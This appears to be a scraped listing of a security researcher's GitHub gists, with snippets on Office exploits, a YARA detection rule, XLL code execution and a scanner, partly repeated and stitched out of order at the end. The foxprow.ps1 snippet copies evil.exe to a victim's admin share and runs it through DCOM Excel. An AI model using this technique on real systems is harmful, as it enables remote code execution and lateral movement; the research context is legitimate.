Rich Warren rxwx

## notes.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              2 stars
            
          
                rxwx
                / notes.md
            
            
              Last active
              March 22, 2024 02:04
            
              
                Notes on new Equation Editor Exploit, CVE-2018-0802 variant
              
          
    New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

VT: https://www.virustotal.com/#/file/189d2dc825a3b1f00b91d3e0b7678b7fb128e74d831d99487b80cbf5cf805a74/detection
Anyrun: https://app.any.run/tasks/e3d99cd3-8886-48f1-a8ce-dde0cbbe0889

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

  
## CVE_2017_8759_CRLF.yara
rule CVE_2017_8759_CRLF {
   meta:
      description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
      author = "Rich Warren @buffaloverflow"
      reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
      date = "2017-09-17"
   strings:
      $s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
   condition:
      $s1

## exploit.pptx

      
              4 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                rxwx
                / exploit.pptx
            
            
              Last active
              September 13, 2017 08:25
            
              
                CVE-2017-8759
              
          
            View raw
        
    
## foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)

## get-linkedin-id.js
// paste this in the chrome console and call findMemberID() when on a profile page
// need to be logged in

function decodeHtml(html) {
    var txt = document.createElement("textarea");
    txt.innerHTML = html;
    return txt.value;
}

function httpGet(){

## cDefaultLaunchAttachmentPerms.md

      
              1 file
            
          
              1 fork
            
          
              1 comment
            
          
              1 star
            
          
                rxwx
                / cDefaultLaunchAttachmentPerms.md
            
            
              Last active
              June 8, 2022 11:06
            
              
                Attachment permissions in each version of Adobe Reader 11.0.10 - 11.0.x
              
          
    Description

This Gist documents the values of the HKLM\SOFTWARE\Policies\Adobe\Acrobat Reader\11.0\FeatureLockDown\cDefaultLaunchAttachmentPerms registry key in each version of Adobe Reader 11.0.10 -> 11.0.x
Value meanings

According to: https://www.adobe.com/devnet-docs/acrobatetk/tools/PrefRef/Windows/Attachments.html#idkeyname_1_2986
There are 3 possible values:

  
## Readme.md

      
              3 files
            
          
              3 forks
            
          
              0 comments
            
          
              1 star
            
          
                rxwx
                / Readme.md
            
            
              Last active
              May 4, 2023 14:19
            
          
    Notes

An XLL file is basically a DLL with some special features to make it work with Excel.
See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx
By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.
The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

  
## findhosts.py
#!/usr/bin/env python

import OpenSSL
from iptools import IpRangeList
import ssl
import socket
import sys
import argparse

def do_scan(range, csv=False):
	rule CVE_2017_8759_CRLF {
	meta:
	description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
	author = "Rich Warren @buffaloverflow"
	reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
	date = "2017-09-17"
	strings:
	$s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
	condition:
	$s1
	$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
	# Windows 10 specific, but searches PATH so ..
	copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
	$excel.ActivateMicrosoftApp("5")
	# excel executes your binary :)
	// paste this in the chrome console and call findMemberID() when on a profile page
	// need to be logged in

	function decodeHtml(html) {
	var txt = document.createElement("textarea");
	txt.innerHTML = html;
	return txt.value;
	}

	function httpGet(){
	#!/usr/bin/env python

	import OpenSSL
	from iptools import IpRangeList
	import ssl
	import socket
	import sys
	import argparse

	def do_scan(range, csv=False):